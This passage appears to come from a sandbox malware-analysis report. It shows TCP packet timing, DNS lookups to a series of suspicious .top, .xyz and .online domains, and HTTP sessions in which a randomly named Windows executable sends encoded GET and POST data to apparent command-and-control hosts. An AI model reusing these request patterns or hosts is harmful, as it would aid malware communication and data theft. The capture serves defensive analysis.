                                                              Sep 11, 2024 22:57:53.798140049 CEST5971380192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:53.805466890 CEST5971380192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:53.810890913 CEST8059713199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:54.255080938 CEST8059713199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:54.255122900 CEST8059713199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:54.255278111 CEST8059713199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:54.255424023 CEST5971380192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:54.255424023 CEST5971380192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:54.258163929 CEST5971380192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:54.263158083 CEST8059713199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:58:07.501872063 CEST5971480192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:07.507087946 CEST8059714188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:07.507200003 CEST5971480192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:07.519224882 CEST5971480192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:07.524492025 CEST8059714188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:08.562009096 CEST8059714188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:08.562340021 CEST8059714188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:08.562354088 CEST8059714188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:08.562396049 CEST5971480192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:08.562962055 CEST8059714188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:08.562973976 CEST8059714188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:08.563045979 CEST5971480192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:09.034169912 CEST5971480192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:10.053131104 CEST5971580192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:10.057888985 CEST8059715188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:10.058074951 CEST5971580192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:10.068998098 CEST5971580192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:10.073803902 CEST8059715188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:11.093650103 CEST8059715188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:11.093660116 CEST8059715188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:11.093668938 CEST8059715188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:11.093673944 CEST8059715188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:11.093723059 CEST5971580192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:11.094643116 CEST8059715188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:11.094693899 CEST5971580192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:11.584609032 CEST5971580192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:12.600481987 CEST5971680192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:12.605353117 CEST8059716188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:12.605438948 CEST5971680192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:12.618120909 CEST5971680192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:12.623037100 CEST8059716188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:12.623235941 CEST8059716188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:13.608714104 CEST8059716188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:13.608731985 CEST8059716188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:13.608746052 CEST8059716188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:13.608762026 CEST8059716188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:13.608776093 CEST8059716188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:13.608807087 CEST5971680192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:13.608839989 CEST5971680192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:14.130140066 CEST5971680192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:15.146958113 CEST5971780192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:15.152082920 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:15.152158976 CEST5971780192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:15.159970999 CEST5971780192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:15.164824009 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140569925 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140666008 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140691996 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140728951 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140744925 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140760899 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140788078 CEST5971780192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:16.140867949 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140883923 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140896082 CEST5971780192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:16.140963078 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140986919 CEST5971780192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:16.141160965 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.141418934 CEST5971780192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:16.145478010 CEST5971780192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:16.150657892 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:24.842487097 CEST5971880192.168.2.7154.23.184.218
                                                              Sep 11, 2024 22:58:24.847382069 CEST8059718154.23.184.218192.168.2.7
                                                              Sep 11, 2024 22:58:24.847481966 CEST5971880192.168.2.7154.23.184.218
                                                              Sep 11, 2024 22:58:24.854794025 CEST5971880192.168.2.7154.23.184.218
                                                              Sep 11, 2024 22:58:24.859600067 CEST8059718154.23.184.218192.168.2.7
                                                              Sep 11, 2024 22:58:25.784841061 CEST8059718154.23.184.218192.168.2.7
                                                              Sep 11, 2024 22:58:25.785070896 CEST8059718154.23.184.218192.168.2.7
                                                              Sep 11, 2024 22:58:25.786114931 CEST5971880192.168.2.7154.23.184.218
                                                              Sep 11, 2024 22:58:25.787558079 CEST5971880192.168.2.7154.23.184.218
                                                              Sep 11, 2024 22:58:25.792289019 CEST8059718154.23.184.218192.168.2.7
                                                              Sep 11, 2024 22:58:30.803083897 CEST5971980192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:30.808078051 CEST8059719152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:30.808255911 CEST5971980192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:30.819317102 CEST5971980192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:30.824263096 CEST8059719152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:31.294392109 CEST8059719152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:31.294471025 CEST8059719152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:31.294512987 CEST8059719152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:31.294521093 CEST5971980192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:31.294601917 CEST5971980192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:32.331151962 CEST5971980192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:33.354095936 CEST5972080192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:33.359709024 CEST8059720152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:33.359841108 CEST5972080192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:33.371570110 CEST5972080192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:33.376394033 CEST8059720152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:33.815606117 CEST8059720152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:33.815907001 CEST8059720152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:33.815920115 CEST8059720152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:33.815989017 CEST5972080192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:34.878098965 CEST5972080192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:35.896996975 CEST5972180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:35.902031898 CEST8059721152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:35.902565956 CEST5972180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:35.914391994 CEST5972180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:35.919188976 CEST8059721152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:35.919231892 CEST8059721152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:36.357664108 CEST8059721152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:36.358491898 CEST8059721152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:36.358540058 CEST8059721152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:36.358539104 CEST5972180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:36.358608007 CEST5972180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:37.424885988 CEST5972180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:38.443581104 CEST5972280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:38.448772907 CEST8059722152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:38.448869944 CEST5972280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:38.457194090 CEST5972280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:38.462110043 CEST8059722152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:38.909491062 CEST8059722152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:38.909596920 CEST8059722152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:38.909718037 CEST5972280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:38.909831047 CEST8059722152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:38.909884930 CEST5972280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:38.912362099 CEST5972280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:38.917541981 CEST8059722152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:43.927836895 CEST5972380192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:43.933916092 CEST805972323.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:43.934058905 CEST5972380192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:43.944741964 CEST5972380192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:43.949486017 CEST805972323.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:44.526738882 CEST805972323.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:44.527240038 CEST805972323.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:44.527446032 CEST5972380192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:45.456171989 CEST5972380192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:46.474658012 CEST5972480192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:46.479532003 CEST805972423.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:46.479634047 CEST5972480192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:46.490766048 CEST5972480192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:46.495534897 CEST805972423.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:47.064145088 CEST805972423.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:47.064449072 CEST805972423.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:47.064516068 CEST5972480192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:48.003310919 CEST5972480192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:49.021569014 CEST5972580192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:49.026563883 CEST805972523.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:49.026958942 CEST5972580192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:49.038165092 CEST5972580192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:49.043617964 CEST805972523.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:49.043647051 CEST805972523.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:49.705274105 CEST805972523.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:49.705399036 CEST805972523.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:49.705558062 CEST5972580192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:50.550009012 CEST5972580192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:51.568464994 CEST5972680192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:51.576209068 CEST805972623.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:51.578162909 CEST5972680192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:51.585516930 CEST5972680192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:51.590404034 CEST805972623.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:52.842560053 CEST805972623.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:52.842576981 CEST805972623.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:52.842736006 CEST5972680192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:52.843014002 CEST805972623.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:52.843027115 CEST805972623.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:52.843080044 CEST5972680192.168.2.723.225.34.75
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                              Sep 11, 2024 22:56:52.225167990 CEST5760253192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:56:52.248512983 CEST53576021.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:57:05.603523016 CEST5226053192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:57:05.674679041 CEST53522601.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:57:18.959932089 CEST6306853192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:57:19.144625902 CEST53630681.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:57:32.521614075 CEST5540353192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:57:32.544328928 CEST53554031.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:57:45.678066969 CEST6465353192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:57:46.139832020 CEST53646531.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:57:59.272669077 CEST6492353192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:57:59.284287930 CEST53649231.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:58:07.351028919 CEST5088653192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:58:07.499408960 CEST53508861.1.1.1192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 11, 2024 22:54:11.222034931 CEST | 192.168.2.7 | 1.1.1.1 | 0x5277 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:54:12.902592897 CEST | 192.168.2.7 | 1.1.1.1 | 0x80d4 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:54:46.860939980 CEST | 192.168.2.7 | 1.1.1.1 | 0x6a80 | Standard query (0) | www.57ddu.top | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:55:03.023618937 CEST | 192.168.2.7 | 1.1.1.1 | 0x802f | Standard query (0) | www.nuv3.top | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:55:16.755569935 CEST | 192.168.2.7 | 1.1.1.1 | 0x31cb | Standard query (0) | www.bashei.top | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:55:30.572293997 CEST | 192.168.2.7 | 1.1.1.1 | 0x203 | Standard query (0) | www.tigre777gg.online | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:55:43.724626064 CEST | 192.168.2.7 | 1.1.1.1 | 0x7326 | Standard query (0) | www.maya24.xyz | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:55:57.304311037 CEST | 192.168.2.7 | 1.1.1.1 | 0xdbf6 | Standard query (0) | www.hiretemp.net | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:56:11.380860090 CEST | 192.168.2.7 | 1.1.1.1 | 0xe87e | Standard query (0) | www.justlivn.net | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:56:25.115231037 CEST | 192.168.2.7 | 1.1.1.1 | 0xad21 | Standard query (0) | www.hemistryb.online | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:56:38.508424044 CEST | 192.168.2.7 | 1.1.1.1 | 0x13b4 | Standard query (0) | www.jeandreo.store | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:56:52.225167990 CEST | 192.168.2.7 | 1.1.1.1 | 0x1108 | Standard query (0) | www.zimra.xyz | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:57:05.603523016 CEST | 192.168.2.7 | 1.1.1.1 | 0xb01 | Standard query (0) | www.legitima.legal | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:57:18.959932089 CEST | 192.168.2.7 | 1.1.1.1 | 0xe25 | Standard query (0) | www.autochemtools.com | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:57:32.521614075 CEST | 192.168.2.7 | 1.1.1.1 | 0x21d | Standard query (0) | www.thewhitediamond.org | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:57:45.678066969 CEST | 192.168.2.7 | 1.1.1.1 | 0x36b6 | Standard query (0) | www.personal-loans-jp8.xyz | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:57:59.272669077 CEST | 192.168.2.7 | 1.1.1.1 | 0x9a23 | Standard query (0) | www.loveinpoeipet07.site | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:58:07.351028919 CEST | 192.168.2.7 | 1.1.1.1 | 0xeee2 | Standard query (0) | www.chinaen.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 11, 2024 22:54:11.391583920 CEST | 1.1.1.1 | 192.168.2.7 | 0x5277 | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 22:54:12.910535097 CEST | 1.1.1.1 | 192.168.2.7 | 0x80d4 | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 22:54:47.047838926 CEST | 1.1.1.1 | 192.168.2.7 | 0x6a80 | No error (0) | www.57ddu.top | 57ddu.top | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 22:54:47.047838926 CEST | 1.1.1.1 | 192.168.2.7 | 0x6a80 | No error (0) | 57ddu.top | | 154.23.184.218 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:55:03.604156971 CEST | 1.1.1.1 | 192.168.2.7 | 0x802f | No error (0) | www.nuv3.top | nuv3.top | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 22:55:03.604156971 CEST | 1.1.1.1 | 192.168.2.7 | 0x802f | No error (0) | nuv3.top | | 152.53.38.0 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:55:17.282279968 CEST | 1.1.1.1 | 192.168.2.7 | 0x31cb | No error (0) | www.bashei.top | | 23.225.34.75 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:55:30.585302114 CEST | 1.1.1.1 | 192.168.2.7 | 0x203 | No error (0) | www.tigre777gg.online | tigre777gg.online | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 22:55:30.585302114 CEST | 1.1.1.1 | 192.168.2.7 | 0x203 | No error (0) | tigre777gg.online | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:55:30.585302114 CEST | 1.1.1.1 | 192.168.2.7 | 0x203 | No error (0) | tigre777gg.online | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:55:43.801392078 CEST | 1.1.1.1 | 192.168.2.7 | 0x7326 | No error (0) | www.maya24.xyz | maya24.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 22:55:43.801392078 CEST | 1.1.1.1 | 192.168.2.7 | 0x7326 | No error (0) | maya24.xyz | | 65.108.194.49 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:55:57.599092960 CEST | 1.1.1.1 | 192.168.2.7 | 0xdbf6 | No error (0) | www.hiretemp.net | | 208.91.197.13 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:56:11.646955967 CEST | 1.1.1.1 | 192.168.2.7 | 0xe87e | No error (0) | www.justlivn.net | justlivn.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 22:56:11.646955967 CEST | 1.1.1.1 | 192.168.2.7 | 0xe87e | No error (0) | justlivn.net | | 76.223.113.161 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:56:25.139343023 CEST | 1.1.1.1 | 192.168.2.7 | 0xad21 | No error (0) | www.hemistryb.online | | 172.67.221.5 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:56:25.139343023 CEST | 1.1.1.1 | 192.168.2.7 | 0xad21 | No error (0) | www.hemistryb.online | | 104.21.24.234 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:56:38.972678900 CEST | 1.1.1.1 | 192.168.2.7 | 0x13b4 | No error (0) | www.jeandreo.store | jeandreo.store | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 22:56:38.972678900 CEST | 1.1.1.1 | 192.168.2.7 | 0x13b4 | No error (0) | jeandreo.store | | 162.240.81.18 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:56:52.248512983 CEST | 1.1.1.1 | 192.168.2.7 | 0x1108 | No error (0) | www.zimra.xyz | | 162.0.213.94 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:57:05.674679041 CEST | 1.1.1.1 | 192.168.2.7 | 0xb01 | No error (0) | www.legitima.legal | legitima.legal | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 22:57:05.674679041 CEST | 1.1.1.1 | 192.168.2.7 | 0xb01 | No error (0) | legitima.legal | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:57:19.144625902 CEST | 1.1.1.1 | 192.168.2.7 | 0xe25 | No error (0) | www.autochemtools.com | | 35.214.33.204 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:57:32.544328928 CEST | 1.1.1.1 | 192.168.2.7 | 0x21d | No error (0) | www.thewhitediamond.org | thewhitediamond.org | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 22:57:32.544328928 CEST | 1.1.1.1 | 192.168.2.7 | 0x21d | No error (0) | thewhitediamond.org | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:57:32.544328928 CEST | 1.1.1.1 | 192.168.2.7 | 0x21d | No error (0) | thewhitediamond.org | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:57:46.139832020 CEST | 1.1.1.1 | 192.168.2.7 | 0x36b6 | No error (0) | www.personal-loans-jp8.xyz | | 199.59.243.226 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:57:59.284287930 CEST | 1.1.1.1 | 192.168.2.7 | 0x9a23 | Name error (3) | www.loveinpoeipet07.site | none | none | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:58:07.499408960 CEST | 1.1.1.1 | 192.168.2.7 | 0xeee2 | No error (0) | www.chinaen.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 22:58:07.499408960 CEST | 1.1.1.1 | 192.168.2.7 | 0xeee2 | No error (0) | www.chinaen.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 59660 | 154.23.184.218 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 22:54:47.076656103 CEST | 437 | OUT | GET /3ozz/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=XDfkmZV0UpreXJRL4a+kMc+s40ElyBknavgDq4xpV4itK9/GJYtr4NsiaYcm7ir36wtKh4I9XU6sRfj+cMnrz2p6V2IZ5AA5gzUpK7TVcpLZf4ygGQ5VljQGU5XXJlbNz7qQtdD+VX81 HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.57ddu.top
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Sep 11, 2024 22:54:47.969984055 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:54:47 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 148
                                                              Connection: close
                                                              ETag: "66a4adce-94"
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 59661 | 152.53.38.0 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 22:55:03.631483078 CEST | 684 | OUT | POST /7f48/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.nuv3.top
                                                              Origin: http://www.nuv3.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.nuv3.top/7f48/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=V99dEg2HZocG8VkDmCM9ywcGEadyYOGDKwjCtFOllJKL0zLFN+wv5s7uE12bDsnsuuw2FaWSnun5o9Swtd8YgnZ4Uokkgh3F3CZajAL7yUDE1Xb4ndH00xgWuQfY/gmrvyO1RE5WuZ2ToD6YI2Kkz9yrAdYuQ+HWOzoL2ot5+qKeyOScFoL/3qthxPdcz3FX1mQtA3dmlC7Aico4xA==
Sep 11, 2024 22:55:04.090749025 CEST | 279 | IN | HTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              cache-control: private, no-cache, max-age=0
                                                              pragma: no-cache
                                                              date: Wed, 11 Sep 2024 20:55:04 GMT
                                                              server: LiteSpeed
                                                              content-encoding: gzip
                                                              vary: Accept-Encoding
                                                              transfer-encoding: chunked
                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 59662 | 152.53.38.0 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 22:55:06.177545071 CEST | 704 | OUT | POST /7f48/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.nuv3.top
                                                              Origin: http://www.nuv3.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.nuv3.top/7f48/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
